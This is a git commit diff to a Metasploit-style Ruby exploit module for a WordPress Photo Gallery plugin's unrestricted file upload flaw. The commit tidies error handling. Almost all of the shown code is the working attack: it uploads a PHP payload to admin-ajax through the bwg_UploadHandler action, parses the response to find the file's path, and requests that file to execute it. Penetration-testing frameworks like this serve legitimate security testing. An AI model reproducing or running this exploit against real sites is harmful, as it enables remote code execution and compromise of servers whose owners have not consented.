Improved error handling, tidied up some code

rastating · rastating · commit cb1efa3edd9c · 2015-02-11T10:16:18.000Z
diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
@@ -76,41 +76,45 @@ def exploit
 
     print_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha(10)
-    uploader_url = normalize_uri(wordpress_url_admin_ajax, '?action=bwg_UploadHandler&dir=rce/')
     data = generate_mime_message(payload, payload_name)
 
     print_status("#{peer} - Uploading payload...")
     res = send_request_cgi(
-      'method'  => 'POST',
-      'uri'     => uploader_url,
-      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
-      'data'    => data.to_s,
-      'cookie'  => cookie
+      'method'    => 'POST',
+      'uri'       => wordpress_url_admin_ajax,
+      'vars_get'  => { 'action' => 'bwg_UploadHandler', 'dir' => 'rce/' },
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s,
+      'cookie'    => cookie
     )
 
     fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
-    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
     print_good("#{peer} - Uploaded the payload")
 
     print_status("#{peer} - Parsing server response...")
-    json = JSON.parse(res.body)
-    if json.nil? || !json['files']
-      fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
-    else
-      uploaded_name = json['files'][0]['name'][0..-5]
-      php_file_name = "#{uploaded_name}.php"
-      payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
-      print_good("#{peer} - Parsed response")
+    begin
+      json = JSON.parse(res.body)
+      if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil?
+        fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
+      else
+        uploaded_name = json['files'][0]['name'][0..-5]
+        php_file_name = "#{uploaded_name}.php"
+        payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
+        print_good("#{peer} - Parsed response")
 
-      register_files_for_cleanup(php_file_name)
-      register_files_for_cleanup("../#{uploaded_name}.zip")
-      print_status("#{peer} - Executing the payload at #{payload_url}")
-      send_request_cgi(
-      {
-        'uri'     => payload_url,
-        'method'  => 'GET'
-      }, 5)
-      print_good("#{peer} - Executed payload")
+        register_files_for_cleanup(php_file_name)
+        register_files_for_cleanup("../#{uploaded_name}.zip")
+        print_status("#{peer} - Executing the payload at #{payload_url}")
+        send_request_cgi(
+        {
+          'uri'     => payload_url,
+          'method'  => 'GET'
+        }, 5)
+        print_good("#{peer} - Executed payload")
+      end
+    rescue
+      fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
     end
   end
 end
